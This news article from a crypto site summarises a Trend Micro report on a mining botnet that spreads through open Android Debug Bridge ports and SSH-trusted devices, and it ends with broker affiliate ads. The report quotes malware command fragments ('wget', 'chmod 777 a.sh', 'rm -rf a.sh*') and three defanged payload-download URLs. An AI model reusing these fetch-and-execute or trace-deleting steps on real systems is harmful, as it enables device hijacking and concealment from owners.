InsideBitcoins.com

Cybersecurity firm Trend Micro finds crypto malware on Android software

The “multinational cyber security and defense company” from Tokyo, Trend Micro, recently reported on a cryptocurrency mining bot that’s infecting Android devices, reports CoinDesk.

Security threats are spread all over

According to Trend Micro, the malware is in 21 different countries. South Korea is where they’ve seen it the most.

Essentially, the bot goes after Android Debug Bridge (ADB) ports. This is terrible considering that the system is used to fix broken applications and other issues on an Android phone.

If default settings are in place, these ports don’t need authentication to open. So, it gets in through these, and can then spread to any device that has ever connected via an SSH connection.

The publication reports that researchers have commented on the process a little further:

“Being a known device means the two systems can communicate with each other without any further authentication after the initial key exchange, each system considers the other as safe. The presence of a spreading mechanism may mean that this malware can abuse the widely used process of making SSH connections.”

From there, the attack takes advantage of the command shell software to change ADB execution permissions. From there, it uses a command called “wget” to take from three miners. It picks from the best of those, and then uses an “chmod 777 a.sh” command to change more permissions.

Then, it hides itself from the host with another command, “rm -rf a.sh*” and deletes the download. Moreover, it hides its past and future trail with this command as well.

The team found three miners sent into systems, all of which had the same URL:

“http://198[.]98[.]51[.]104:282/x86/bash

http://198[.]98[.]51[.]104:282/arm/bash

http://198[.]98[.]51[.]104:282/aarch64/bash”

It then runs a few more optimizations to make the attack run even faster.

Overall, these attacks are becoming more and more common. In fact, Trend Micro found another attack on ADB systems last year, which they called the Satoshi Variant. It seems that users may want to start buying cryptocurrency instead of mining to stay far away from this threat.

Top brokers for buying and trading cryptocurrencies

  • Platform
  • Features
  • Rating
  • Visit Site
  • US-Friendly
  • Paypal accepted
  • 12+ cryptocurrencies
4.5/5

Visit Site
75% of retail investors lose money.
eToro Reviews

    eToro Reviews

    https://insidebitcoins.com/visit/etoro-newsCreate your account
    Hide eToro Reviews
    • Best broker for non-US countries
    • Trade crypto CFDs, forex and stocks
    • No withdrawal or deposit fees
    4.5/5

    Visit Site
    80.5% of retail investors lose money.
    Plus500 Reviews

      Plus500 Reviews

      https://insidebitcoins.com/visit/plus500-newsCreate your account
      Hide Plus500 Reviews
      Remember, all trading carries risk. Past performance is no guarantee of future results.
      Avatar

      Cryptocurrency and games writer. Looking to the future by studying how these two industries can blend.